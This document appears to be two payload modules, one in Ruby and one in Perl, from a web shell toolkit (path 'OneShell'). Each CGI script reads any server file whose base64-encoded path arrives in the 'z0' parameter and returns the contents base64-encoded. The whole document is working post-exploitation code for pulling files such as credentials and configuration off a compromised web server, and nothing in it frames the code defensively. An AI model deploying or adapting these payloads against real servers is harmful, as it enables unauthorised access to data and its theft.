File: Payload/Ruby/CGI/OneShell/file_readbuffer.rb
# $_POST: global variable used by the Ruby loader

require 'base64'

def main
  file_path = Base64.decode64($_POST['z0'].to_s)

  if !File.exist?(file_path)
    print "ERROR://Cannot find file: #{file_path}"
    return
  end

  begin
    file_data = File.read(file_path, mode: 'rb')
    
    print Base64.strict_encode64(file_data)
    return
  rescue => e
    print "ERROR://Cannot read file: #{file_path}"
    return
  end
end

main()

File: Payload/Perl/CGI/OneShell/file_readbuffer.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';

    my $file_path = decode_base64($z0);

    if (!-e $file_path) {
        die "ERROR://Cannot find file: " . $file_path;
    }

    my $file_data = '';
    
    if (open(my $fh, '<', $file_path)) {
        binmode($fh);
        
        local $/; 
        $file_data = <$fh>;
        
        close($fh);
    } else {
        die "ERROR://Cannot open file: " . $file_path;
    }

    print encode_base64($file_data, '');
}

main();